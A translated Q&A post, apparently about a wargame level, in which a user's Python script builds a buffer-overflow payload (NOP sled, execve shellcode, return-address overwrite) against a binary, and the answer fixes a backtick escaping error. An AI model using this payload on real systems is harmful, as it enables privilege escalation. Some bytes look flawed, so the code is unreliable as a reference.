当我尝试执行以下脚本时:
#!/usr/bin/python
import os
level="/casper/casper61 "
tmp_level="/tmp/r_734224hlb/casper61/casper61 "
nop_sled= "\x90"*40
shellcode="\x31\xc0\x50\x68\x2f\x2f\x78\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
buf_addr= "\x60\x98\x04\x08"
overw_buf= "X"*603
payload = nop_sled + shellcode+ overw_buf + buf_addr
os.system(level+ payload)
exploit()
我收到此错误:
sh:1:语法错误:反引号中的EOF。
我还有另一个类似的脚本,其中只有缓冲区地址不同,可以正常工作。
有人可以帮助我吗?谢谢
答案 0 :(得分:0)
生成的漏洞利用程序包含一个`(反引号/反引号),该错误会导致该错误,转义该错误应予以解决。
'/casper/casper61 \xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x90\xc2\x901\xc3\x80Ph//xhh/bin\xc2\x89\xc3\xa3P\xc2\x89\xc3\xa2S\xc2\x89\xc3\xa1\xc2\xb0\x0b\xc3\x8d\xc2\x80XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\\`<-HERE\xc2\x98\x04\x08'
payload = (nop_sled + shellcode + overw_buf + buf_addr).replace('`', '\\`')